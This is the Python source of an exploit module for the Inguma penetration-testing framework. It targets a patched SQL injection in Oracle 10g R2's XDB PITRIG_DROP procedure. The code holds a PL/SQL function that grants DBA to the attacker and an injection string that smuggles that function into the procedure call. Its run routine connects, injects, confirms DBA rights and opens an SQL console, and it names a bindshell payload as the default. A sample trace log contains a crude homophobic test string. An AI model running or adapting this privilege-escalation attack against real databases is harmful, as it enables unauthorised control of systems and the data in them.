#!/usr/bin/python

"""
Oracle 10g R2 SQL Injection exploit for Inguma
Copyright (c) 2007 Joxean Koret <joxeankoret@yahoo.es>

License is GPL
"""

import sys
import time
import socket
import cx_Oracle

from lib.libexploit import CIngumaModule
from payloads.oracle import run_command

name = "orainject12"
brief_description = "Oracle 10g R2 PITRIG_DROP SQL Injection"
type = "exploit"
affects = ["Oracle 10g XDB SQL Injection"]
description = """
Oracle 10g is vulnerable to a remote authenticated SQL Injection. 
Tested in Oracle 10g R2.
"""

patch = "Fixed in CPUJAN2008"
category = "exploit"
discoverer = "Joxean Koret"
author = "Joxean Koret <joxeankoret@yahoo.es>"

globals = ["sid", ]

funnyProc = """
CREATE OR REPLACE FUNCTION %FUNCTION%
  RETURN VARCHAR2 AUTHID CURRENT_USER
IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO %USER%';
  COMMIT;
  RETURN NULL;
END;"""

funnyCall = """
BEGIN
  XDB.XDB_PITRIG_PKG.PITRIG_DROP('SYS', 'DUAL" WHERE %USER%.%FUNCTION%=1--');
END;
"""

"""
Example:

PARSING IN CURSOR #1 len=80 dep=0 uid=86 oct=47 lid=86 tim=1175821237317013 hv=2394812100 ad='3ad50a50'
BEGIN
  XDB.XDB_PITRIG_PKG.PITRIG_DROP('HI', 'MUM" WHERE DADDY.IS=GAY');
END;
END OF STMT
PARSE #1:c=29995,e=29063,p=0,cr=0,cu=0,mis=1,r=0,dep=0,og=1,tim=1175821237316977
=====================
PARSE ERROR #2:len=133 dep=1 uid=0 oct=3 lid=0 tim=1175821237335849 err=972
select r.sys_nc_oid$  from xdb.xdb$resource r, "HI"."MUM" WHERE DADDY.IS=GAY" u  where sys_op_r2o(r.xmldata.xmlref) = u.sys_nc_oid$
*** 2008-02-26 16:49:07.041
ksedmp: internal or fatal error
ORA-00604: se ha producido un error a nivel 1 de SQL recursivo
ORA-00972: identificador demasiado largo
EXEC #1:c=29994,e=29414,p=0,cr=0,cu=0,mis=0,r=0,dep=0,og=1,tim=1175821237346962
ERROR #1:err=604 tim=830787110

"""
class COraPitrigDrop(CIngumaModule):
    target = ""
    port = 1521
    waitTime = 0
    timeout = 1
    exploitType = 1
    services = {}
    results = {}
    dict = None
    interactive = True
    command = ""
    sid = ""
    user = ""
    password = ""
    covert = 0
    connection = None

    def run(self):
        if self.target == "" or self.target is None:
            self.target = "localhost"
        
        if self.port == 0 or self.port is None:
            self.port = 1521

        if self.sid == "":
            print "[+] No sid selected, using ORCL"
            self.sid = "ORCL"

        if self.payload < 1:
            print "[+] No payload selected. Using 'bindshell' (payload = 2)"
            self.payload = 2

        link    = "%s/%s@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=%s)(PORT=%d)))" % (self.user, self.password, self.target, self.port)
        link += "(CONNECT_DATA=(SERVICE_NAME=%s)))" % self.sid
        print link

        self.connection = cx_Oracle.connect(link)
        self.connection.rollback()
        self.connection.commit()
        cur = self.connection.cursor()
        cur.execute("alter session set sql_trace = true")

        print "[+] Using payload run_command to grant DBA... "

        objRun = run_command.CPayload()
        objRun.idsTechniques = self.covert
        objRun.user = self.user
        objRun.command = "GRANT DBA TO " + self.user
        objRun.connection = self.connection
        objRun.method = 0
        data = objRun.run()

        self.function = objRun.function

        try:
            print "[+] Creating a funny function"
            tmp = funnyProc.replace("%USER%", self.user).replace("%FUNCTION%", objRun.function).upper()
            print tmp
            cur.execute(tmp)
        except:
            if str(sys.exc_info()[1]).find("ORA-00955:") > -1:
                print "[!] Warning! A previous attempt have been detected!"

        try:
            print "[+] Injecting data"
            tmp = funnyCall.replace("%USER%", self.user).replace("%FUNCTION%", objRun.function).upper()
            print tmp
            cur.execute(tmp)
        except:
            err = sys.exc_info()[1]

            if str(err).find("ORA-44003:") > -1:
                print "[!] Vulnerability appears to be fixed with DBMS_ASSERT, exploit doesn't work :("
                self.connection.close()
                return False
            else:
                print err

        print "[+] Verifying ... "

        sql = "select 1 from user_role_privs where granted_role = 'DBA'"
        cur.execute(sql)

        for x in cur.fetchall():
            print "[+] Exploit works! You're DBA."
            self.connection.close()
            print "[+] Opening an SQL terminal."
            self.runCommand("oratool", {"console":True})
            return True

        print "[!] Exploit doesn't work  :("
        self.connection.close()
        return False

    def printSummary(self):
        pass
